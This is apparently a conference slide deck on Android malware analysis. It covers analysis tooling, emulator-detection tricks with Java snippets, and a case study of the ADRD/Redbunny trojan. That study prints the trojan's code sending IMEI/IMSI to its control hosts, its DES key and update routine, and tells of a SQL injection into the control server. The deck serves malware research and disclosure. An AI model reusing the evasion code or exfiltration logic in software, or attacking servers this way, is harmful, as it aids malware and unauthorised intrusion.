! Lost in translation WTF is happening inside my Android Phone Ok Cancel
Cancel
Static Analysis
Reversing
Red Bunny
Dynamic Analysis
Android System
Conclusion
Contents
8:30 PM
Contents
- Register-based virtual machine
- It uses its own bytecode, not Java bytecode.
- Run on a slow CPU with little RAM.
- Run on an operating system without swap space.
- Optimized for memory efficiency.
- Dex class file format.
8:30 PM
DALVIK VM
8:30 PM
Analysis Environment
Tools
Case-sensitive file system :D
Android SDK
Android NDK
Android source code
Eclipse
Apktool, Dex2jar, JD-GUI
Android Emulator
Examples:
- Easy: Use a.class and A.class as class names: the file will be hidden on case-insensitive file systems.- Medium: Optimize/ofuscate the code with ProGuard.- Hard: Modify bytecode to break reversing tools (be sure that it still runs on Dalvik.)
Ej: androguard-a1:
Insert value type VALUE_ANNOTATION
8:30 PM
Anti-analysis
if self.__value_type >= VALUE_SHORT ... elif self.__value_type == VALUE_ARRAY : ... elif self.__value_type == VALUE_BYTE : ... elif self.__value_type == VALUE_NULL : ... elif self.__value_type == VALUE_BOOLEAN : ... else : raise(“oops”)
Basic:
- Create an Android Virtual Device. -> $android (SDK)
- $emulator -port 5560 @virtual-device -tcpdump capture.pcap
- $adb install app.apk
- $adb shell monkey -v -p package.app 700
- $adb shell logcat -d && $adb shell logcat -b events -d (radio also)
- $adb shell '/data/busybox find / -type f -exec /data/busybox md5sum
8:30 PM
Dynamic Analysis
- Simulate phone events:
Send SMS:
echo sms send +34656566789 test | nc localhost 5554D/AT ( 32): AT< 00200b914356566687f900001120720274404004e3f0380c
Simulate calls:
$echo gsm call +34656566789 |nc localhost 5554$echo gsm accept +34656566789 |nc localhost 5554$echo gsm cancel +34656566789 |nc localhost 5554
Change GPS coordinates:
$echo geo fix -82.411629 28.054553|nc localhost 5554
8:30 PM
Make it more real
Advance:
- Create you own system image and modify the java classes to log the program flow. Example, framework/base/core/java/android/os/Process.java
8:30 PM
Dynamic Analysis
$git clone git://android.git.kernel.org/kernel/common
$git branch -a
$git checkout --track -b android-goldfish-2.6.29 origin/android-goldfish-2.6.29
$adb pull /proc/config.gz ./;gunzip config.gz; mv config .config
Edit and Add CONFIG_MODULES=y (disable by default on emulator kernel)
$emulator -avd armv5y -kernel /tmp/zImage
8:30 PM
Compiling Android Kernel modules
- Detecting the emulator is very easy:
DEVICE_ID:
String id = Settings.Secure.getString(this.getContentResolver(), Settings.Secure.ANDROID_ID);boolean emulator = TextUtils.isEmpty(id);
Solution:
Change secure->android_id on data/data/com.android.providers.settings/databases/settings.db
IMSI:
TelephonyManager manager = (TelephonyManager)getSystemService(TELEPHONY_SERVICE); String imsi = manager.getSubscriberId(); (00000... on emulator)
Solution:
Patch the emulator binary (search for +CGSN string) or the emulator source code (external/qemu/telephony/android_modem.c).
8:30 PM
Anti-VM
- LocationManager.NETWORK_PROVIDER -> IllegalArgumentException
- Detect ADB stuff.. process, network, debug enabled...
- /proc/cpuinfo - > Hardware : Goldfish
- vibrator.vibrate(milliseconds) and use SensorListener (sensor data doesn’t change) (Thanks Ehooo)
- Qemu specific detection (Google)
Solution:
Patch emulator, Qemu, system hooking...
8:30 PM
More Anti-VM
- http://www.android-x86.org/ . Supports VMware
- Use a real phone... Slower
8:30 PM
Alternatives to Android Emulator
- Alternative markets, repacked applications.
-SMS, MMS vulnerabilities, Fuzzing!!!.
- Wireless, Bluetooth Drivers
- NFC
- System componentes: Webkit, sound library, Kernel.
8:30 PM
Attack Vectors
8:30 PM
Third party software
Source: http://android.git.kernel.org/
- "Security Alert 2011-02-14: New Android Trojan 'ADRD' Was Found in the Wild by Aegislab" ( http://blog.aegislab.com/index.php?op=ViewArticle&articleId=75&blogId=1 )
- "[…] Today, we found a new Android trojan, we call it "ADRD", which was not reported by any security vendors before. […]"
- Jaime Blasco and Pablo Rincón were working together, analyzing this malware on Feb 2, 2011:
* Name: com.beautyfullivewallpaper * Date: Feb. 2, 2011, 1:49 p.m.
- Also known as HongTouTou
8:30 PM
ADRD aka Redbunny
!Notification
- Permission list: * INTERNET, WRITE_EXTERNAL_STORAGE, ACCESS_NETWORK_STATE, READ_PHONE_STATE, RECEIVE_BOOT_COMPLETED, MODIFY_PHONE_STATE, WRITE_APN_SETTINGS..
- Cipher module/library calls (DES): * init Ljavax/crypto/Cipher; Lcom/xxx/yyy/ddda; decrypt
- Function calls to retrieve the IMSI/IMEI codes: * IMEI: getDeviceId Lcom/xxx/yyy/MyService; onCreate * IMSI: getSubscriberId Lcom/xxx/yyy/MyService; onCreate
- HTTP Requests (GET and POST): * String str8 = "http://adrd.taxuan.net/index.aspx?im=" + (String)localObject; * adrd.xiaxiab.com
POST /index.aspx?im=82a68757db94a88dace3e401a5721b33af757f73d68485eab1244e5dace3ed65910991f4dbd438af
8:30 PM
Detection
- Sends http requests through a proxy: * HttpHost localHttpHost = new HttpHost("10.0.0.172", 80, "http"); * HttpParams localHttpParams = localDefaultHttpClient.getParams().setParameter("http.route.default-proxy", localHttpHost);
- Services: * com.xxx.yyy.MyService * .beauty.Beauty- Intents: * android.intent.action.BOOT_COMPLETED **** -> Boots at system startup * android.intent.action.PHONE_STATE * android.net.conn.CONNECTIVITY_CHANGE
8:30 PM
Detection
8:30 PM
Analysis I
Service module (MyService):- Sets the preferred apn- Runs each 12 hours- Looks for specific APN network : “CMWAP” || “UNIWAP”
1Sets a Proxy for GET/POST and HTTP specially crafted headers (UA, MIME types) 2
Cipher data modulepublic static String encrypt/decryptCipher localCipher = Cipher.getInstance("DES/CBC/PKCS5Padding");
3Send data to adrd.taxuan.net/index.aspx?im=%s:+ IMEI+ IMSI+ Netway (preferred APN)+ iversion+ oversion 4
Loop + Decrypt response + Switch(cmd) It depends on the + 0 Do nothing + 1 adad.StartGo() + 2 ParseO + 3 UpdateHelper()
5adad.StartGo()Sends http://adrd.xiaxiab.com/pic.aspx?im=+encrypt(IMEI+IMSIParses the big list of ulrs/referersB#1#963a_w1|http://59.173.12.105/g/g.ashx?w=963a_w1BBBB.Go() -> Retrieves search lists ofwap.baidu.comFixUrls(): Send random requests adding BAIDU_WISE_UID and HTTP_HEADERS.Sends log data to control servers 6
ParseO(): parse server response (number, flags, tags..):T213607170863|12345|+你好-10086+是吗abc可能-597|回复[确认' 6
UpdateHelper installs the update apk 6
- Following the encryption routines, the DES key is found…: this.kk = "48734154";
* UpdateHelper class: public class UpdateHelper { private static String savefilepath = "/myupdate.apk"; private Context ct; private int netway;
* Benefit from visits to the content (Baidu) and bandwidth consumption (China Mobile && Unicom) and also SMS charges.
- Server URLs (there are more): http://adrd.xiaxiab.com/pic.aspx?im=CIPHERED_DATA http://adrd.taxuan.net/index.aspx?im=CIPHERED_DATA
- We want to know more!!
8:30 PM
Analysis II
- adrd.xiaxiab.com from an eagle view:
* Microsoft-IIS/6.0
* Debug Enabled (Displaying .NET errors and backtraces)
* Hidden paths to the .Net/aspx application
* ALL is Chinese! (WTF!?!"·$%&/(?)
- Possible vector attacks:
* HTTP functions + DES key + pyDes = "legal" HTTP Requests (at least for the adrd server)
8:30 PM
Control Servers
- First results:
* Exceptions in chinese. Google Translate is your friend
* Errors at .NET (it didn't generate any html list/table, or view to use for data displaying)
* We got a successful Sql injection after the last ciphered parameter :D).
* User without admin privileges.
* Permissions to run Backups + Shared Resources = Timeout
* Other possibilities: + 1: Create a temporal db, with just one table each time, dump paginated rows and run backups. Problem: Complex to do and complex to rebuild the original DB (Also the lang didn't help) + 2: Try to get a shell in any possible way. Problem: time, exploits, noise (our current attacks were hidden by DES at the http logs, and it's not usual to log all the db queries for performance reason.
8:30 PM
Control Servers
Search
- All the scheme obtained: list of Tables, Fields, types, stored procedures
- IMEI/IMSIs list (at least some of them), logs, keywords, Baidu accounts
- The main stored procedure affected by the sql injection retrieves the URL of myupdate.apk, that points to adrd.xiaxiab.com/down.aspx ! * Parameters: @imei varchar(50), @imsi varchar(50), @ip varchar(128), @logs varchar(256), @netwap int
* Store procedure: --if (@netwap=2) select 'T-1|T11' --select 'T3http://adrd.xiaxiab.com/down.aspx' --select 'T213607170863|12345|+你好-10086+是吗abc可能-597|回复[确认' --else --select 'T013607170863' * Looks that they were considering the netwap (based on the mobile operator) as a criteria to send commands * TX (where X seems to be a command type) * 13607170863 is a phone number located at Wuhan
8:30 PM
Database Information
t_baiduHourPercent: autoid, mHour, mPercentt_baidukeyword: keyword, viewcountt_baidukeywordflash: keywordt_baiduOrtherKey: keyword, viewcountt_baidupwd: id, way, username, pwdt_baiduwayname: way, waynamet_keywordResult: id, keyword, link, head, flagt_androidtemplog: id, imsi, way, result, createtimet_keywordResult20100601: id, keyword, link, head, flagt_keywordResult20101108: id, keyword, link, head, flagt_baiduHourPercent20101012: autoid, mHour, mPercentt_androidtemplog_backup: id, imsi, way, result, createtimet_androidtemperrlog: id, compresslog, decompresslog, createtimet_androidtemplog_backup201101: id, imsi, way, result, createtimet_android访问记录: id, imei, imsi, logs, ip, createtime, netwayt_android日点击量表: 日期, 用户数, 点击量, 次数, createtime
t_baidutask: maxmdncount, mdncount, percent, f3percent, createtime, useridt_点击量切换计划表: way, maxClick, minClick, leaveTotalClick, leaveEffectClick
t_有效关键字_wap_20100323: keyword, createtime
t_有效关键字_wap_20100722备份: keyword, createtime
8:30 PM
Database Scheme
t_标准比对表: myear, mmonth, mday, mhour, total
t_点击量切换标志表: way, flag
t_任务表: keyword, flag
t_任务表_wap: keyword, flag
t_任务表_wap_back无效: keyword, flag
t_任务表_wap_back有效: keyword, flag
t_任务方式: flag
t_无效关键字: keyword, createtime
t_无效关键字_wap: keyword, createtime
t_有效关键字: keyword, createtime
t_有效关键字_wap: keyword, createtime
- It uses the main package of the ADRD family xxx.yyy.
- The update has other permissions: WRITE_SMS, READ_SMS, RECEIVE_SMS, SEND_SMS..
- Looks like a google reader
- It adds a local sqlite DB (keyword storage). go_g1_sms: id, keyword, type, flag go_g2_sms: id, keyword, keyword2
- SMSObserver: * Replaces keywords on SMS’s. * Sends SMS!
8:30 PM
Myupdate.apk
8:30 PM
Samples
Package name Md5 Adrd Ver IVer
com.beautyfullivewallpaper 4556a687a2845bf4dfac62c594938cf3 adrd.zt.cw.1 6
com.yodesoft.yohandcar 6783cee889fa64df68af58a56ff6e362 adrd.zt.2 6
com.binaryloft.live.winter aa5216da617839e818d83d8185da42b0 adrd.zt.jtj.2 6
com.magicwach.rdefense 839c37f3a2c8d31561d28f619a2a712e adrd.zt.cw.3 6
com.tat.livewallpaper.dandelion 5192ad05597e7a148f642be43f6441f6 adrd.zt.cw.4 6
com.classicnerds.livewallpaper.HK b72724d8fc0f633194dcc3bd28eec026 adrd.zt.cw.5 7
fishnoodle.night_city a01ba26a34e55f71873782348ff5e074 adrd.zt.dxm.6 7
com.appspot.swisscodemonkeys.steam cdfca19bf212adf3292e4fe677fe46a6 adrd.zt.cw.7 7
kr.mobilesoft.yxplayer e3cc6c7af0d83fe322116254c01cf720 adrd.zt.cw.8 7
com.labgency.wallpapers.waves 7d764347a0b0c9d11160d7a7684bf02b adrd.zt.dxm.8 7
com.laucass.andromax 627f41c8f8e7ab007641c4a0c1d8ce1b adrd.zt.cw.9 7
com.digitalchocolate.androidrollergapp 71c0a67daa544450d7c620a48cc059b0 drd.zt.cw.12 7
proscio.wallpaper.shamroc e09782d35d72a769dc7454adb6d8e2e9 adrd.zt.cw.15 7
com.tt.yy f2596f8f3c52381318f62d1ab161c284 ?? ??
8:30 PM
Infections
Other affected operators:
Far EasT one Peoples Telephone CompanyHutchison 3GPCCW Mobile SundayHong Kong TelecomSmart One Mobile
g Infections by operator +20K different IMSIs